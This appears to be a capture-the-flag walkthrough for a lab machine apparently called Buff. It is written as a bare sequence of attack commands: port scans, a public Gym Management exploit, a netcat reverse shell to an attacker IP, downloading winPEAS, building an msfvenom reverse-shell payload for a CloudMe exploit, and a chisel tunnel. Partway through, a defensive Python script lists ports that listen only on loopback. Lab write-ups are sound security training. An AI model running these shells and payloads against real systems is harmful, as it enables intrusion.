nmap -A -p- -oA buff 10.129.191.5 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA active 10.129.191.5

nmap -sU -O -p- -oA buff-udp 10.129.191.5

nikto -h 10.129.191.5:8080

whatweb http://10.129.191.5:8080

http://10.129.191.5:8080

We run searchsploit Gym Management

We download the file

searchsploit -m 48506.py

python2 48506.py http://buff.htb:8080

We see that it is a fake shell, and it seems to always give us the same result.

dir C:\Users\shaun\Desktop

locate nc.exe

cp /usr/share/SecLists/Web-Shells/FuzzDb/nc.exe .

To get a better reverse shell.

nc.exe -e cmd 10.10.14.110 443

rlwrap nc -lvnp 443

We check what kinds of privileges we have

whoami /priv

whoami /all

curl http://10.10.14.110/winPeasx86.exe -o winPEAS.exe

https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe/binaries/Obfuscated%20Releases

.\winPEAS.exe

netstat -nat

After running winPeas.exe and reviewing its output, we see port 8888, which is used by CloudMe.

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.110 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload

We copy the output into the script obtained below and replace the payload in 48389.py with it.

./chisel server --reverse -p 8000

.\chisel.exe client 10.10.14.110:8000 R:8888:localhost:8888
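The netstat step above found CloudMe listening on 8888 bound to localhost, and the chisel reverse tunnel is exactly what makes such a loopback-only service reachable from outside. As an added example that is not part of the original writeup, this Python script parses Windows netstat -nat output and lists the ports that listen only on loopback, so a defender can inventory the services a tunnel would expose; the netstat output below is constructed, not captured from the box.

```python
import re
from typing import List, NamedTuple

# Constructed sample of Windows `netstat -nat` output; not captured from the box.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           Offload State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       InHost
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       InHost
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       InHost
  TCP    10.129.191.5:8080      10.10.14.110:51234     ESTABLISHED     InHost
  TCP    [::]:445               [::]:0                 LISTENING       InHost
  TCP    [::1]:8888             [::]:0                 LISTENING       InHost
"""

class Listener(NamedTuple):
    proto: str
    host: str
    port: int
    loopback_only: bool

# Only TCP sockets in LISTENING state matter here; UDP rows carry no state column.
LISTEN_RE = re.compile(r"^\s*(TCP)\s+(\S+)\s+\S+\s+LISTENING\b")

def split_host_port(addr: str):
    """Split 'host:port' or '[v6addr]:port' into (host, port)."""
    host, _, port = addr.rpartition(":")
    return host.strip("[]"), int(port)

def is_loopback(host: str) -> bool:
    return host.startswith("127.") or host == "::1"

def parse_listeners(netstat_text: str) -> List[Listener]:
    listeners = []
    for line in netstat_text.splitlines():
        m = LISTEN_RE.match(line)
        if not m:
            continue
        host, port = split_host_port(m.group(2))
        listeners.append(Listener(m.group(1), host, port, is_loopback(host)))
    return listeners

def loopback_only_ports(netstat_text: str) -> List[int]:
    """Ports whose every listener is bound to loopback: hidden from the network, reachable through a tunnel."""
    flags_by_port = {}
    for l in parse_listeners(netstat_text):
        flags_by_port.setdefault(l.port, set()).add(l.loopback_only)
    return sorted(p for p, flags in flags_by_port.items() if flags == {True})

if __name__ == "__main__":
    for port in loopback_only_ports(SAMPLE_NETSTAT):
        print(f"port {port} listens only on loopback; a local tunnel would expose it")
```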

nc -lvnp 443

Copyright © 2022 Cu3rv0x, all rights reserved